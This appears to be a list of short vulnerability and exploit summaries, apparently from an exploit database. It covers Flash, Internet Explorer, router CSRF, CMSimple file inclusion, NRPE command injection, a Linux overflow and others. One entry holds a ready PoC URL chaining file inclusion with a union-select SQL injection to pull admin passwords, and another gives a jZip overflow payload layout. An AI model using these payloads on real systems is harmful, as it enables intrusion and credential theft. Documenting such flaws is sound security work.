This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.5.502.149. By supplying a specially crafted swf file with special regex value, it is possible to trigger an memory corruption, which results in remote code execution under the context of the user, as exploited in the wild in February 2013. This module has been tested successfully with Adobe Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before MS13-063, since it takes advantage of a predictable SharedUserData in order to leak ntdll and bypass ASLR.
The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage to change SSID and its password.
The LFI vulnerability is in index.php, so you can include a file by doing http://[site]/index.php?view=[file]. By using the LFI, you can also include 'admin files' which are especially unsecure, and let you inject SQL queries. As the file admin/sources/edit_loginad.php, a PoC can be done by http://[site]/index.php?view=../admin/Sources/edit_loginad&edit=-1%20union%20select%201,2,3,4,%28SELECT%20password%20FROM%20admin%29,6,7,8,9--%20-
This PoC is based on Wilmer van der Gaast's code and is used to reactivate the Sercomm TCP/32674 backdoor. It sends a packet with the type PING_BACKDOOR to the destination MAC address.
CMSimple is a php based Content Managemant System (CMS), which requires no database. All data are stored in a simple file system. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which includes a URL in the 'pth[folder][plugin]' parameter. This can allow the attacker to include a remote file containing arbitrary code, which will be executed by the vulnerable server.
This exploit is a proof-of-concept (PoC) code for CVE-2014-2851, which is a Linux group_info refcounter overflow memory corruption vulnerability. The code is written in C and is designed to crash the system if the app does not crash. It takes a while to execute because it calls 2^32 socket() calls.
Nagios Remote Plugin Executor (NRPE) contains a vulnerability that could allow an attacker to remotely inject and execute arbitrary code on the host under NRPE account (typically 'nagios'). The vulnerability is due to NRPE not properly sanitizing user input before passing it to a command shell as a part of a configured command. In order for an attacker to take advantage of the host NRPE must be compiled and configured with command arguments. No authentication is required to exploit this vulnerability if the NRPE port has not been protected with a firewall.
A vulnerability have been found in SAP Router that could allow an unauthenticated remote attacker to obtain passwords used to protect route entries by a timing side-channel attack.
This module exploits an use after free condition on Internet Explorer as used in the wild on the 'Operation SnowMan' in February 2014. The module uses Flash Player 12 in order to bypass ASLR and finally DEP.
This exploit is a SEH Unicode buffer overflow vulnerability in jZip v2.0.0.132900. The vulnerability is triggered when a specially crafted zip file is opened, causing a denial of service. The exploit author created a zip file with a payload of 862 A characters, followed by two 4-byte NSEH and SEH values, and then 3198 D characters. The payload is then followed by a .txt extension.
Services By CQR